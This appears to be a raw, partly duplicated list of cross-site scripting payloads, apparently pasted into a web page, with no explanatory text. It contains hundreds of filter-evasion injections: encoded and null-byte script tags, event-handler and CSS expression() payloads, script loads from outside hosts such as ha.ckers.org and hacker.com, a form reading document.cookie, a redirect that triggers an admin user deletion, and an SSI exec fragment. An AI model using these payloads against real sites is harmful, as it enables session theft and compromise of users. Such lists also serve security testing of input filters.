<video/poster/onerror=alert()> <isindex/autofocus/onfocus=alert()> xxs link xxs link <IMG """>alert("XSS")"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"> <SCRIPT/SRC="http://ha.ckers.org/xss.js"> <alert("XSS");//<
  • XSS
    exp/* ¼script¾alert(¢XSS¢)¼/script¾
    <? echo('<SCR)';echo('IPT>alert("XSS")'); ?> +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"> PT SRC="http://ha.ckers.org/xss.js"> XSS 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" veris-->group<svg/onload=alert(/XSS/)// #"> element[attribute=' [
    [" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg("XSS") <svg/onload=%26%23097lert%26lpar;1337)> <script><script> <sCRIPt> test %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
    "> ">123 "> 123 "> 123 "><h1></h1>123 "> 123 > Hover the cursor to the LEFT of this Message &ParamHeight=250 "> ">123 "> 123 <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=`` onerror=alert(1) <script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/') </script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> <img/ src=`~` onerror=prompt(1)> <form><iframe src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[]" onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style>/**/alert(document.location)/**/ <form> /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ X alert(0%0) <style/onload=<!-- > alert (1)> <///style///>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X" /> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a><button> DIV <a>X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf" /> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> On Mouse Over <a>Click Here</a> <%<!--'%><script>alert(1);</script --> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value="<" /><iframe/src=javascript:confirm(1) X http://www.alert(1) </script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script +-+-1-+-+alert(1) <body/onload=<!--> (1)> /*<script* */alert(1)// confirm(1); alert(1) ClickMe alert(1) style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)> x "> CLICKME click Click Me <script\x20type="text/javascript">javascript:alert(1); <script\x3Etype="text/javascript">javascript:alert(1); <script\x0Dtype="text/javascript">javascript:alert(1); <script\x09type="text/javascript">javascript:alert(1); <script\x0Ctype="text/javascript">javascript:alert(1); <script\x2Ftype="text/javascript">javascript:alert(1); <script\x0Atype="text/javascript">javascript:alert(1); '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1)
    </svg onResize>
    </body onMouseEnter></body onFocus> </frameset onScroll> </html onMouseUp></body onPropertyChange> </svg onLoad></body onPageHide></body onMouseOver></body onUnload></body onLoad> </bgsound onPropertyChange></html onMouseLeave></html onMouseWheel></body onPageShow></frameset onFocus> </applet onError> </marquee onStart> </html onMouseOver></html onMouseEnter></body onBeforeUnload></html onMouseDown> </marquee onScroll> </xml onPropertyChange> </frameset onBlur> </applet onReadyStateChange> </svg onUnload></html onMouseOut></body onMouseMove></body onResize> </body onPopState></html onMouseMove> </applet onreadystatechange></body onpagehide> </svg onunload> </applet onerror></body onkeyup></body onunload> </body onload></html onmouseover> </body onbeforeunload></body onfocus></body onkeydown> </svg onload></html onmousemove></body onblur> \x3Cscript>javascript:alert(1) '"`> javascript:alert(1)</script\x0A javascript:alert(1) --> --> --> --> --> `"'>test "'`>

     

    test test test test test test test test test test test test test test"'`>ABC DEF "'`>ABC DEF '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script\x20type="text/javascript">javascript:alert(1); <script\x3Etype="text/javascript">javascript:alert(1); <script\x0Dtype="text/javascript">javascript:alert(1); <script\x09type="text/javascript">javascript:alert(1); <script\x0Ctype="text/javascript">javascript:alert(1); <script\x2Ftype="text/javascript">javascript:alert(1); <script\x0Atype="text/javascript">javascript:alert(1); ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF ABC DEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1) <script\x20>javascript:alert(1) <script\x0D>javascript:alert(1) <script\x0A>javascript:alert(1) <script\x0C>javascript:alert(1) <script\x00>javascript:alert(1) <script\x09>javascript:alert(1) "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> `"'> `"'> `"'> `"'> `"'> `"'> `"'> alert(1)0 document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML; <x '="foo"> x <? foo=">javascript:alert(1)"> <! foo=">javascript:alert(1)"> </ foo=">javascript:alert(1)"> <? foo=">"> <! foo="[[[Inception]]"> <% foo> d.innerHTML=d.innerHTML <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> XXX javascript:alert(1)"` `> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1) <!-- [if<img src=x onerror=javascript:alert(1)//]> --> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object></div></image></x></b></object> <object width="300" height="150" classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"><param name="postdomevents" /></object> <a style="-o-link: 'javascript:javascript:alert(1)'; -o-link-source: current;">X</a></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div><a style="-o-link: 'javascript:javascript:alert(1)'; -o-link-source: current;">@import "data:,*%7bx:expression(javascript:alert(1))%7D"; </a><a style="position: absolute;">XXX</a><a>XXX</a></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div><a style="-o-link: 'javascript:javascript:alert(1)'; -o-link-source: current;">X</a> <div style="font-family: 'foo;color:red;';">XXX <div style="font-family: foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div style="font-family: 'foo;color:red;';"> <div style="font-family: foo}color=red;"> <div style="content: url('/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(svg')s);"> </div> <div style="list-style: url('http://foo.f') );">X <div id="d"> <div style="font-family: 'sans'; color:red;';">X</div> </div> <div style="background: url(/f#oo/;">X <div style="font-family: foo{bar; background: url(http://foo.f/oo};">X <div id="x">XXX</div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div style="font-family: 'foo;color:red;';"> <div style="font-family: foo}color=red;"> <div style="list-style: url('http://foo.f') );"> <div style="background: url(/f#oo/;"> <div style="font-family: foo{bar; background: url(http://foo.f/oo};">XXX</div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div style="font-family: 'foo;color:red;';"> <div style="font-family: foo}color=red;"> <div style="list-style: url('http://foo.f') );"> <div style="background: url(/f#oo/;"> <div style="font-family: foo{bar; background: url(http://foo.f/oo};">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi</div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div style="font-family: 'foo;color:red;';"> <div style="font-family: foo}color=red;"> <div style="list-style: url('http://foo.f') );"> <div style="background: url(/f#oo/;"> <div style="font-family: foo{bar; background: url(http://foo.f/oo};">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div style="font-family: 'foo;color:red;';"> <div style="font-family: foo}color=red;"> <div style="list-style: url('http://foo.f') );"> <div style="background: url(/f#oo/;"> <div style="font-family: foo{bar; background: url(http://foo.f/oo};">¼script¾javascript:alert(1)¼/script¾ X 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behA:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> 1 <a>XXX</a> <label></label> <div id="x">x</div> <a><img /> <img /> <img /> < <img src="/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(scriptlet)s" /> <img /> <img /> <br /> </a></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div style="font-family: 'foo;color:red;';"> <div style="font-family: foo}color=red;"> <div style="list-style: url('http://foo.f') );"> <div style="background: url(/f#oo/;"> <div style="font-family: foo{bar; background: url(http://foo.f/oo};"> <ul> <li>XSS</li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div style="x\x3aexpression(javascript: alert(1);"> <div style="x: expression\x5C(javascript:alert(1);"> <div style="x: expression\x00(javascript:alert(1);"> <div style="x: exp\x00ression(javascript:alert(1);"> <div style="x: exp\x5Cression(javascript:alert(1);"> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div> <div style="font-family: 'foo;color:red;';"> <div style="font-family: foo}color=red;"> <div style="list-style: url('http://foo.f') );"> <div style="background: url(/f#oo/;"> <div style="font-family: foo{bar; background: url(http://foo.f/oo};"> <ul> <li><iframe width="300" height="150"></iframe></li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <table><!--?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <form id="test" ?--><!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --><!-- ---> <!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --></table> <div style="background-image: );"> <div style="background-image: );"> <div><img /></div> </div> </div> <div style="background-image: );"> <div style="background-image: );"> <div><!-- [if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--></div> </div> </div> <div style="background-image: );"> <div style="background-image: );"> <div><object data="/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(scriptlet)s" type="text/x-scriptlet" width="300" height="150"></object> <object width="300" height="150" classid="clsid:ae24fdae-03c6-11d1-8b76-0080c744f389"><param name="url" value="javascript:javascript:alert(1)" /></object></div> </div> </div> <button form="test"></button><button form="test">X</button><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><input type="text" autofocus="" /> <p> </p> <p>&&<script&&>javascript:alert(1)&&;&&<&&/script&&></p> <p><!--?xml version="1.0"?-->javascript:alert(1); <embed width="300" height="150"></embed> <embed width="300" height="150"></embed> <embed src="/group/tsvetyi-ukrashayut-nashu-zhizn-/12558962/edit/%(jscript)s" width="300" height="150"></embed> <object width="300" height="150"> <embed type="image" src="%(scriptlet)s" /> <xml id="I"><x><c><![CDATA[<img />]]</c><x></x></x></xml> <img /> <a>test1</a> <a>test1</a> <embed width="500" height="500" code="data:text/html,<script>%(payload)s</script>" /> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>alert(String.fromCharCode(88,83,83)) '';!--"<xss>=&{()} <img /> <img /> <img /> <img /> <img says="" xss="" /> xxs link xxs link <IMG """>alert("XSS")"> <img /> <img src="onmouseover="alert('xxs')"" /> <img /> <img /> <img /> <img /> <img /> <img /> <img /> perl -e 'print "<img src="java\0script:alert(\"XSS\")" />";' > out <img /> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"> <SCRIPT/SRC="http://ha.ckers.org/xss.js"> <alert("XSS");//< <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// '"--> <? echo('<SCR)';echo('IPT>alert("XSS")'); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

    +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"> PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=`` onerror=alert(1) <script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> <img/ src=`~` onerror=prompt(1)> <form><iframe src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[]" onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style>/**/alert(document.location)/**/ <form> /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ X alert(0%0) <style/onload=<!-- > alert (1)> <///style///>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X" /> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a><button> DIV <a>X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf" /> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> On Mouse Over <a>Click Here</a> <%<!--'%><script>alert(1);</script --> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value="<" /><iframe/src=javascript:confirm(1) X <iframe>

    click </script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script +-+-1-+-+alert(1) <body/onload=<!--> (1)> /*<script* */alert(1)// confirm(1); alert(1) ClickMe alert(1) style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)> x "> CLICKME click Click Me '';!--"=&{()} '>//\\,<'>">">"*" '); alert('XSS <IMG """>"> <script>

    <? echo('<scr)'; echo('ipt>alert(\"XSS\")'); ?> ">

    </> window.alert("Bonjour !");

    <iframe onload=alert('XSS')> "> '">> XSS " onfocus=alert(document.domain) "> <"
    • XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"\";' > out
      alert(1) </br style=a:expression(alert())> ">
    [color=red width=expression(alert(123))][color] Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "> '"> '"> '""> <<<(123) '> '>"> } a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='> <script+src=">"+src="http://yoursite.com/xss.js?69,69"> >">/XaDoS/> ">/KinG-InFeT.NeT/> src="http://www.site.com/XSS.js"> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /> XSS by xss ">> XSS by xss '">> XSS by xss <img """> XSS by xss XSS by xss ">">> XSS by xss XSS by xss '>
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\\' <input type="IMAGE" /> <link rel="stylesheet" /> <table> <td> <div style="background-image: );"> <div style=""> <object type="text/x-scriptlet" data="http://hacker.com/xss.html"> <embed src="http://hacker.com/xss.swf" allowscriptaccess="always" /> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!--[if gte IE 4]> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT 